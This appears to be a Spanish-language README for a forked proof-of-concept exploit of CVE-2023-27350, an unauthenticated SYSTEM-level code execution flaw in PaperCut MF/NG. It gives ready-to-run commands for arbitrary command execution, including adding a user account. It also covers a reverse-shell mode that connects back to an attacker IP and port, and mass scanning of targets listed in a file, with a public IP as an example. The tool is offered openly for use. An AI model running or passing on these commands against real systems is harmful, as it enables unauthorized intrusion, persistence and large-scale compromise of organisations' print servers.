
Exploit para Papercut CVE-2023-27350. [+] Reverse shell [+] Comprobación masiva
Este es un exploit de prueba de concepto (POC) para CVE-2023-27350, una vulnerabilidad encontrada en PaperCut MF/NG que permite a un atacante no autenticado ejecutar código arbitrario con privilegios de SYSTEM.
Antes de usar este exploit, asegúrate de tener instaladas las siguientes librerías:
pip install -r requirements.txt
-u, --url: La URL de la aplicación objetivo PaperCut MF/NG (p. ej., http://target-ip:9191).-c, --command: El comando a ejecutar en el sistema objetivo.--reverse-shell: Usa un payload de reverse shell para ejecutar comandos en el sistema objetivo.-f, --file: Comprueba múltiples objetivos desde un archivo (p. ej., file.txt).Para ejecutar un comando en el sistema objetivo, usa la opción -c:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
Para usar un payload de reverse shell y ejecutar comandos en el sistema objetivo, usa la opción --reverse-shell. Se te pedirá tu dirección IP y número de puerto:
python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>
Para comprobar múltiples objetivos desde un archivo, usa la opción -f. El formato del archivo debe ser ip_address:port:
python CVE-2023-27350.py -f file.txt
file.txtCuando uses la opción de comprobación masiva con el archivo file.txt, asegúrate de que el contenido del archivo tenga el formato correcto.
Cada línea del archivo debe contener la dirección IP y el número de puerto de un objetivo, separados por dos puntos :. Por ejemplo:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
Asegúrate de que no haya espacios ni caracteres adicionales entre la dirección IP, los dos puntos y el número de puerto. Además, asegúrate de que cada línea contenga solo una dirección IP y un número de puerto.
Este es un fork del repositorio horizon3ai/CVE-2023-27350. Todo el crédito del exploit original corresponde a sus autores.